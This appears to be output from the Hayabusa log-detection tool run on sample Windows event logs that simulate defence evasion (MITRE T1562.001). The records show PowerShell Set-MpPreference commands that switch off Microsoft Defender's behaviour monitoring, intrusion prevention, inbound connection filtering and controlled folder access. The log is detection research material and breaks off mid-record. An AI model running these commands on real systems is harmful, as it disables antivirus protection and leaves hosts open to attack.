ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.962 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.986 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.989 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.999 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.010 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableBehaviorMonitoring $true,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.070 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.071 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.088 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.091 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.106 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.118 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableIntrusionPreventionSystem $true,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.134 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.134 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.151 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.155 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:52.339 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:52.355 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableInboundConnectionFiltering $true,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:52.423 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:52.423 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:52.430 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:52.432 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:46:09.533 +00:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -EnableControlledFolderAccess Disabled"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x242c | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 09:46:09.533 +00:00,win10-02.offsec.lan,4688,low,Exec,Non Interactive 